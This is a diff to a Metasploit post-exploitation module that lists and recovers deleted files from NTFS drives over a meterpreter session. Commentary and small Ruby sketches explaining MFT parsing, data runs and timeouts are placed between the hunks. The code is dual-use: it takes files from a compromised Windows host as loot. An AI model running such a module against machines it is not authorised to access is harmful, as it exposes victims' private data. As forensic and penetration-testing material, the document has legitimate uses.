@@ -11,20 +11,27 @@ class Metasploit3 < Msf::Post

  def initialize(info = {})
    super(update_info(info,
-      'Name'          => 'Windows Gather Recovery Files',
-      'Description'   => %q{
-          This module list and try to recover deleted files from NTFS file systems.},
-      'License'       => MSF_LICENSE,
-      'Platform'      => ['win'],
-      'SessionTypes'  => ['meterpreter'],
-      'Author'        => ['Borja Merino <bmerinofe[at]gmail.com>'],
-      'References'    => [
+      'Name'          => 'Windows Gather Deleted Files Enumeration and Recovering',
+      'Description'   => %q{
+          This module lists and tries to recover deleted files from NTFS file systems.
+          Use the FILES option to guide recovery: leave it empty to enumerate deleted
+          files on the DRIVE, set it to an extension (e.g. "pdf") to recover deleted
+          files with that extension, or set it to a comma-separated list of IDs (from
+          enumeration) to recover those files. Note that enumeration and recovery can
+          take a long time; use the TIMEOUT option to abort enumeration or recovery
+          by extension after that many seconds.
+      },
+      'License'       => MSF_LICENSE,
+      'Platform'      => ['win'],
+      'SessionTypes'  => ['meterpreter'],
+      'Author'        => ['Borja Merino <bmerinofe[at]gmail.com>'],
+      'References'    => [
          ['URL', 'http://www.youtube.com/watch?v=9yzCf360ujY&hd=1']
        ]
      ))

    register_options(
      [
-        OptString.new('FILES', [false, 'ID or extensions of the files to recover in a comma separated way.', ""]),
+        OptString.new('FILES', [false, 'ID or extensions of the files to recover, comma separated. Leave empty to enumerate deleted files.', ""]),
        OptString.new('DRIVE', [true, 'Drive you want to recover files from.', "C:"]),
        OptInt.new('TIMEOUT', [true, 'Search timeout. If 0 the module will go through the entire $MFT.', 3600])
      ], self.class)
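
The FILES option thus does double duty: all-numeric entries are MFT record IDs
from a previous enumeration, anything else is treated as an extension. A
minimal stand-alone sketch of that dispatch (the helper name is hypothetical;
the split(',') and the ID-vs-extension distinction mirror the run logic below):

    def classify_files_option(value)
      return :enumerate if value.empty?           # empty FILES => enumeration only
      entries = value.split(',')
      # all-numeric entries are record IDs, anything else is an extension
      entries.all? { |e| e =~ /\A\d+\z/ } ? :by_id : :by_extension
    end

    classify_files_option("")            # => :enumerate
    classify_files_option("8245,9130")   # => :by_id
    classify_files_option("pdf,docx")    # => :by_extension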
@@ -51,7 +58,7 @@ def run
      return
    end

-    print_status("Drive: #{drive} OS: #{winver}")
+    print_status("System Info - OS: #{winver}, Drive: #{drive}")
    type = datastore['FILES']
    files = type.split(',')
    # To extract files from their IDs
@@ -68,14 +75,14 @@ def run
    handle = get_mft_info(drive)
    if handle != nil
      data_runs = mft_data_runs(handle)
-      print_status("It seems that MFT is fragmented (#{data_runs.size - 1} data runs)") if (data_runs.count > 2)
+      vprint_status("It seems that the MFT is fragmented (#{data_runs.size - 1} data runs)") if (data_runs.count > 2)
      to = (datastore['TIMEOUT'].zero?) ? nil : datastore['TIMEOUT']
      begin
        ::Timeout.timeout(to) do
          deleted_files(data_runs[1..-1], handle, files)
        end
      rescue ::Timeout::Error
-        print_error("Server timed out after #{to} seconds. Skipping...")
+        print_error("Timed out after #{to} seconds. Skipping...")
      end
    end
  end
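
Mapping a TIMEOUT of 0 to nil works because Timeout.timeout(nil) imposes no
deadline at all, so 0 really does mean "walk the entire $MFT". A stand-alone
illustration of the pattern (the sleep stands in for the MFT walk; the values
are placeholders):

    require 'timeout'

    timeout_opt = 0                        # stand-in for datastore['TIMEOUT']
    to = timeout_opt.zero? ? nil : timeout_opt
    begin
      ::Timeout.timeout(to) { sleep 0.1 }  # the deleted_files scan would run here
      puts "finished within the deadline"
    rescue ::Timeout::Error
      puts "Timed out after #{to} seconds. Skipping..."
    end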
@@ -98,8 +105,8 @@ def recover_file(offset,handle)
      rf = client.railgun.kernel32.ReadFile(handle, 1024, 1024, 4, nil)
      attributes = rf['lpBuffer'][56..-1]
      name = get_name(attributes)
-      print_status("File to download: #{name}}")
-      print_status("Getting Data Runs ...")
+      print_status("File to download: #{name}")
+      vprint_status("Getting Data Runs ...")
      data = get_data_runs(attributes)
      if data == nil or name == nil
        print_error("There were problems recovering the file: #{name}")
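
The hardcoded 56 above is the usual offset of the first attribute in an MFT
FILE record (1024 bytes on most NTFS volumes). A hedged sketch of the header
fields these slices rely on; strictly, the first-attribute offset lives at
bytes 20..21 of the record and merely happens to be 0x38 (56) on standard
records:

    record = "FILE" + "\x00" * 1020             # dummy 1024-byte record
    magic       = record[0, 4]                  # "FILE" signature
    attr_offset = record[20, 2].unpack('v')[0]  # offset to the first attribute
    flags       = record[22, 2].unpack('v')[0]  # 0x0000 => deleted file,
                                                # 0x0001 => in use, 0x0002 => directory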
@@ -110,32 +117,31 @@ def recover_file(offset,handle)
      if data[0] == 0
        print_status("The file is resident. Saving #{name} ...")
        path = store_loot("resident.file", "application/octet-stream", session, data[1], name.downcase, nil)
-        print_good("File saved: #{name.downcase}")
+        print_good("File saved on #{path}")

      # If the file is not resident
      else
-        path = store_loot("nonresident.file", "application/octet-stream", session, nil, name.downcase, nil)
-
        # Due to the size of the non-resident files we have to store small chunks of data as we go through each of the data runs
-        # that make up the file (save_file function). That's way we use store_loot and File.Open in append mode.
-        file = File.open(path, "ab")
+        # that make up the file (save_file function).
        size = get_size(rf['lpBuffer'][56..-1])
        print_status("The file is not resident. Saving #{name} ... (#{size} bytes)")
        base = 0
        # Go through each of the data runs to save the file
+        file_data = ""
        1.upto(data.count - 1) { |i|
          datarun = get_datarun_location(data[i])
          base = base + datarun[0]
-          size = save_file([base, datarun[1]], size, file, handle)
+          size = save_file([base, datarun[1]], size, file_data, handle)
        }
-        file.close
-        print_good("File saved: #{name.downcase}")
+        #file.close
+        path = store_loot("nonresident.file", "application/octet-stream", session, file_data, name.downcase, nil)
+        print_good("File saved on #{path}")
      end
    }
  end

  # Save the non-resident file to disk
-  def save_file(datarun, size, file, handle)
+  def save_file(datarun, size, file_data, handle)
    ra = file_system_features(handle)
    bytes_per_cluster = ra['lpOutBuffer'][44, 4].unpack("V*")[0]
    distance = get_high_low_values(datarun[0] * bytes_per_cluster)
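
The change above trades the old open-in-append File handle for an in-memory
buffer: each data run's chunk is appended to a Ruby string, and store_loot is
called once with the complete payload, so no partially written loot file is
left behind if recovery dies halfway. The pattern in isolation (the chunk
contents are placeholders; the commented call shows where the real data goes):

    file_data = ""
    chunks = ["chunk one ", "chunk two"]       # placeholder data-run contents
    chunks.each { |c| file_data << c }         # what save_file now does per run
    puts file_data                             # => "chunk one chunk two"
    # path = store_loot("nonresident.file", "application/octet-stream",
    #                   session, file_data, name.downcase, nil)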
@@ -144,19 +150,19 @@ def save_file(datarun,size,file,handle)
    buffer_size = 8
    division = datarun[1] / buffer_size
    rest = datarun[1] % buffer_size
-    print_status("Number of chunks: #{division} Rest: #{rest} clusters Chunk size: #{buffer_size} clusters")
+    vprint_status("Number of chunks: #{division} Rest: #{rest} clusters Chunk size: #{buffer_size} clusters")
    if (division > 0)
      1.upto(division) { |i|
        if (size > bytes_per_cluster * buffer_size)
          rf = client.railgun.kernel32.ReadFile(handle, bytes_per_cluster * buffer_size, bytes_per_cluster * buffer_size, 4, nil)
-          file.write(rf['lpBuffer'])
+          file_data << rf['lpBuffer']
          size = size - bytes_per_cluster * buffer_size
-          print_status("Save 1 chunk of #{buffer_size * bytes_per_cluster} bytes, there are #{size} left")
+          vprint_status("Saved 1 chunk of #{buffer_size * bytes_per_cluster} bytes, #{size} bytes left")
        # It's the last data run
        else
          rf = client.railgun.kernel32.ReadFile(handle, bytes_per_cluster * buffer_size, bytes_per_cluster * buffer_size, 4, nil)
-          file.write(rf['lpBuffer'][0..size - 1])
-          print_status("Save 1 chunk of #{size} bytes")
+          file_data << rf['lpBuffer'][0..size - 1]
+          vprint_status("Saved 1 chunk of #{size} bytes")
        end
      }
    end
@@ -166,13 +172,13 @@ def save_file(datarun,size,file,handle)
    if (size < rest * bytes_per_cluster)
      rf = client.railgun.kernel32.ReadFile(handle, rest * bytes_per_cluster, rest * bytes_per_cluster, 4, nil)
      # Don't save the slack space
-      file.write(rf['lpBuffer'][0..size - 1])
-      print_status("(Last datarun) Save 1 chunk of #{size}")
+      file_data << rf['lpBuffer'][0..size - 1]
+      vprint_status("(Last data run) Saved 1 chunk of #{size} bytes")
    else
      rf = client.railgun.kernel32.ReadFile(handle, bytes_per_cluster * rest, bytes_per_cluster * rest, 4, nil)
-      file.write(rf['lpBuffer'])
+      file_data << rf['lpBuffer']
      size = size - bytes_per_cluster * rest
-      print_status("(No last datarun) Save 1 chunk of #{rest * bytes_per_cluster}, there are #{size} left")
+      vprint_status("(Not the last data run) Saved 1 chunk of #{rest * bytes_per_cluster} bytes, #{size} bytes left")
    end
  end
  return size
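
The "Don't save the slack space" branch matters because reads come back
cluster-aligned: on the final chunk only the first `size` remaining bytes are
file payload, and the tail of the last cluster (the slack) must be dropped. A
stand-alone illustration with placeholder values:

    bytes_per_cluster = 4096
    chunk = "A" * bytes_per_cluster       # one full cluster read from disk
    size  = 1000                          # bytes of the file left to save
    file_data = ""
    file_data << chunk[0..size - 1]
    puts file_data.bytesize               # => 1000, slack discarded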
@@ -212,18 +218,18 @@ def go_over_mft(logc,offset,handle,files)
      # If FILE header and deleted file (\x00\x00)
      rf = client.railgun.kernel32.ReadFile(handle, 1024, 1024, 4, nil)
      if (rf['lpBuffer'][0, 4] == "\x46\x49\x4c\x45") and (rf['lpBuffer'][22, 2] == "\x00\x00")
-      name = get_name(rf['lpBuffer'][56..-1])
-      if name != nil
-        print_status("Name: #{name} ID: #{logc}")
-        # If we want to save it according to the file extensions
-        if files != "" and files.include? File.extname(name.capitalize)[1..-1]
-          print_good("Hidden file found!")
-          recover_file([logc.to_s], handle)
-          dist = get_high_low_values(logc + 1024)
-          # We need to restore the pointer to the current MFT entry
-          client.railgun.kernel32.SetFilePointer(handle, dist[0], dist[1], 0)
-        end
-      end
+        name = get_name(rf['lpBuffer'][56..-1])
+        if name != nil
+          print_status("Name: #{name} ID: #{logc}")
+          # If we want to save it according to the file extensions
+          if files != "" and files.include? File.extname(name.capitalize)[1..-1]
+            print_good("Hidden file found!")
+            recover_file([logc.to_s], handle)
+            dist = get_high_low_values(logc + 1024)
+            # We need to restore the pointer to the current MFT entry
+            client.railgun.kernel32.SetFilePointer(handle, dist[0], dist[1], 0)
+          end
+        end
      # MFT entry with no FILE '\x46\x49\x4c\x45' header or it's not a deleted file (dir, file, deleted dir)
      else
        logc = logc + 1024
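
The get_high_low_values/SetFilePointer pairing exists because Win32's
SetFilePointer takes a 64-bit distance as a low DWORD plus a high DWORD, so
byte offsets past 4 GiB must be split before the Railgun call. A minimal
sketch of what the helper is assumed to do (the name below is hypothetical):

    def split_high_low(offset)
      low  = offset & 0xFFFFFFFF
      high = (offset >> 32) & 0xFFFFFFFF
      [low, high]
    end

    split_high_low(1024)        # => [1024, 0]
    split_high_low(5 * 2**30)   # => [1073741824, 1]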
@@ -246,7 +252,7 @@ def deleted_files(data_runs,handle,files)
    0.upto(data_runs.size - 1) { |i|
      datar_info = get_datarun_location(data_runs[i])
      base = base + datar_info[0]
-      print_status("MFT data run #{i + 1} is at byte #{base * bytes_per_cluster}. It has a total of #{datar_info[1]} clusters")
+      vprint_status("MFT data run #{i + 1} is at byte #{base * bytes_per_cluster}. It has a total of #{datar_info[1]} clusters")
      # Add to the beginning
      real_loc.unshift([base * bytes_per_cluster, (bytes_per_cluster * datar_info[1]) / 1024])
    }
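
A hedged sketch of NTFS data-run decoding, which get_datarun_location is
assumed to implement: each run starts with a header byte whose low nibble
gives the size of the cluster-count field and whose high nibble the size of
the starting-cluster field; the starting cluster is signed and relative to the
previous run, which is why the callers keep a running `base`:

    def decode_data_run(run)
      header   = run.getbyte(0)
      len_size = header & 0x0F       # bytes used for the cluster count
      off_size = header >> 4         # bytes used for the relative offset
      length = 0
      len_size.times { |i| length |= run.getbyte(1 + i) << (8 * i) }
      offset = 0
      off_size.times { |i| offset |= run.getbyte(1 + len_size + i) << (8 * i) }
      # the offset is signed: sign-extend if its top byte has the high bit set
      offset -= 1 << (8 * off_size) if off_size > 0 && run.getbyte(len_size + off_size) >= 0x80
      [offset, length]
    end

    # 0x21 => 1-byte length, 2-byte offset: 4 clusters starting at LCN 0x0560
    decode_data_run("\x21\x04\x60\x05".b)   # => [1376, 4]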
@@ -287,12 +293,12 @@ def get_mft_info(drive)
    bytes_per_cluster = ra['lpOutBuffer'][44, 4].unpack("V*")[0]
    mft_logical_offset = ra['lpOutBuffer'][64, 8].unpack("V*")[0]
    offset_mft_bytes = mft_logical_offset * bytes_per_cluster
-    print_status("Logical cluster : #{ra['lpOutBuffer'][64, 8].unpack('h*')[0].reverse}")
-    print_status("NTFS Volumen Serial Number: #{ra['lpOutBuffer'][0, 8].unpack('h*')[0].reverse}")
-    print_status("Bytes per Sector: #{ra['lpOutBuffer'][40, 4].unpack('V*')[0]}")
-    print_status("Bytes per Cluster: #{bytes_per_cluster}")
-    print_status("Length of the MFT (bytes): #{ra['lpOutBuffer'][56, 8].unpack('Q*')[0]}")
-    print_status("Logical cluster where MTF starts #{mft_logical_offset}")
+    vprint_status("Logical cluster: #{ra['lpOutBuffer'][64, 8].unpack('h*')[0].reverse}")
+    vprint_status("NTFS Volume Serial Number: #{ra['lpOutBuffer'][0, 8].unpack('h*')[0].reverse}")
+    vprint_status("Bytes per Sector: #{ra['lpOutBuffer'][40, 4].unpack('V*')[0]}")
+    vprint_status("Bytes per Cluster: #{bytes_per_cluster}")
+    vprint_status("Length of the MFT (bytes): #{ra['lpOutBuffer'][56, 8].unpack('Q*')[0]}")
+    vprint_status("Logical cluster where the MFT starts: #{mft_logical_offset}")
    # We set the pointer to the beginning of the MFT
    client.railgun.kernel32.SetFilePointer(r['return'], offset_mft_bytes, 0, 0)
    return r['return']
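
For reference, the buffer offsets used above line up with the Win32
NTFS_VOLUME_DATA_BUFFER structure returned by FSCTL_GET_NTFS_VOLUME_DATA (a
fact of the Win32 API, not something defined in this module); a sketch of the
unpacking with a dummy buffer:

    #   bytes  0..7   VolumeSerialNumber
    #   bytes 40..43  BytesPerSector
    #   bytes 44..47  BytesPerCluster
    #   bytes 56..63  MftValidDataLength  ("Length of the MFT")
    #   bytes 64..71  MftStartLcn         (logical cluster where the MFT starts)
    buf = "\x00" * 96                     # dummy 96-byte buffer for illustration
    bytes_per_cluster = buf[44, 4].unpack('V')[0]
    mft_start_lcn     = buf[64, 8].unpack('Q<')[0]
    offset_mft_bytes  = mft_start_lcn * bytes_per_cluster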